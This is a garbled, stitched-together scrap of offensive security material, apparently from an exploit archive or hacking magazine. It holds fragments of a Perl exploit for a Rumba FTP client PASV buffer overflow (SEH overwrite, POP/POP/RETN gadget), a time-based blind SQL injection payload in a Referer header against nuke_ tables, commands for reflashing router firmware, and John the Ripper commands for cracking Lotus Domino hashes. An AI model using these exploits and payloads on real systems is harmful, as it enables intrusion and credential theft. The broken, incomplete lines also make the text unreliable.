Rumba ftp Client 4.2 PASV BoF (SEH)

. "226 Directory send OK.\r\n";

Listening on port 21 with pasv port of 31337

&senddata( '122', '105' );

print "Client Connected!\nAwaiting Ftp commands: \n";

= $_[0] * 256 + $_[1];

$port, Proto => 'tcp', Listen => '1' );

logged in.\r\n" if (/PASS/i);

#POP EDI/POP ESI/RETN

print $data "257 \"/\" is current directory.\r\n" if (/

print $data "200 Type set to A.\r\n"

print $data "214 Syntax: SITE - (site-specific commands)\

1060 Apr 23 23:17

REFERER: '=(select if(true,sleep(10),0) from nuke_

mtd3: 00010000 00010000 "mtd3"

$ cd DSL/TYLinuxV3/src && make

$ thttpd -g -d ~/ForRouter -u user -p 8080

$ mksquashfs unpacked_fs my_fs.img -noappend

# cp my_fs.img /dev/mtdblock/0 && reboot

# cat /dev/mtdblock/0 > /var/fs.img

, D-Link- AR7, Acorp, NetGear, Linksys, Actionec...

IBM Lotus Domino Server Lotus,

, Web- Lotus (Lotus

STATE SERVICE VERSION

./john HASH.txt --format=lotus5

./john HASH.txt --format=dominosec

Web- Lotus Domino, (NRPC 1352 ),

STEP BY STEP HOWTO